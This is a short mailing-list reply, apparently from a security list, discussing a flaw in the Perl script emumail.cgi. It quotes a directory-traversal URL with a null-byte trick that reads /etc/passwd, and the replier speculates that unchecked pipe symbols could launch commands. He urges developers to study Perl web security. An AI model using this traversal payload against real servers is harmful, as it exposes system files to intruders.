>>>>> "MegaHz" == MegaHz <admin@cyhackportal.com> writes: MegaHz> u can also do this: MegaHz> http://site/emumail.cgi?type=/../../../../../etc/passwd%00 MegaHz> but u cannot do this: MegaHz> http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00 It's Perl, so I bet they didn't check for pipe symbols at the beginning and ending either. That can launch things. I wish people who write Perl code for the net would at *least* read the Perl Web Security FAQ *at a minimum*, or hire an outside Perl company (like Stonehenge :) to vet the code. -- Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095 <merlyn@stonehenge.com> <URL:http://www.stonehenge.com/merlyn/> Perl/Unix/security consulting, Technical writing, Comedy, etc. etc. See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!
